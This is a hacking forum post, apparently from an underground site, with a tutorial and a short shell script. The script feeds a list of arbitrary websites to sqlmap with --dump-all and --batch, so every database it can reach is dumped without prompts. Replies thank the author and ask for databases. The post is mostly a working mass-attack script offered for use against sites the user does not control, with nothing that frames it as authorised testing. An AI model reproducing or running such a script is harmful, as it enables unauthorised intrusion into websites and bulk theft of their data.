SWAT 121 [hide] LIKE OR GET AUTOBANNED TUTORIAL: [align=center]1. Just get a list of websites and save them to a file. 2. save this shell script to a file[/align] [align=center]#!/bin/sh #sunjester / https://underwurld.club #automating sqlmap if [ -z $1 ]; then echo "specify a file" exit fi while IFS='' read -r line || [[ -n "$line" ]]; do sqlmap -u $line --dump-all --answers="follow=Y" --batch done < "$1"[/align] 3. execute the shell script in your console with the name of the file with the list of websites you saved [align=center](This script will suppress all the questions and may take longer than a normal sqlmap scan.) [/align] LIKE OR GET AUTOBANNED [/hide] 1 Quote Share this post Link to post Share on other sites
mhmoudmaher2020 5 thanks can u make one to get database please Quote Share this post Link to post Share on other sites
rprock001 0 great works and great efforts. thanks for sharing Quote Share this post Link to post Share on other sites
junior8143 1 thanks can u make one to get database please Quote Share this post Link to post Share on other sites